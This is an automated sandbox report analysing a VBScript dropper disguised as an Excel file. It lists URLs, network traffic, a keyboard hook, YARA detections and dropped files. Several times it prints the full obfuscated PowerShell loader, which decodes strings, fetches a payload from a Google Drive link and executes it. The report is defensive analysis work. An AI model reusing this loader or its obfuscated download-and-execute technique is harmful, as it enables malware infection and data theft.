Source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoX
Source: wscript.exe, 00000000.00000003.1405620829.000001A46831B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.1522074715.000001A468230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128d36
Source: wscript.exe, 00000000.00000003.1406453153.000001A4682E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000003.1406453153.000001A468296000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1406310996.000001A46826E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyP
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyXR
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.comP
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2126865356.000001F08BE7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7944.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Heathenise.ShellExecute Studiechef210,Hulloed,"","" ,Printprogrammerne

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6951
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6951	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6951	Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B29C342	3_2_00007FFB4B29C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B29B596	3_2_00007FFB4B29B596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5F250	9_2_00A5F250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5FB20	9_2_00A5FB20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5EF08	9_2_00A5EF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022FE2D0	11_2_022FE2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F4AD8	11_2_022F4AD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022FDB08	11_2_022FDB08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F3EC0	11_2_022F3EC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F4208	11_2_022F4208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25513D58	11_2_25513D58
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25548718	11_2_25548718
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25549B80	11_2_25549B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25540040	11_2_25540040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_255432C8	11_2_255432C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_255458E0	11_2_255458E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25548E78	11_2_25548E78
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25540006	11_2_25540006
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2554AC30	11_2_2554AC30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_255435B1	11_2_255435B1
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A11C5C	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A125D3	17_2_00A125D3

Java / VBScript file with very long strings (likely obfuscated code)

Source: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Yara signature match

Source: amsi32_7944.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@21/10@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Saltspoonful.Dag

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcc22og1.cto.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs"

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: P^uu	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: Wu	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: WABOpen	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: Wu	17_2_00A11C5C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7944
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

ReversingLabs: Detection: 37%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS 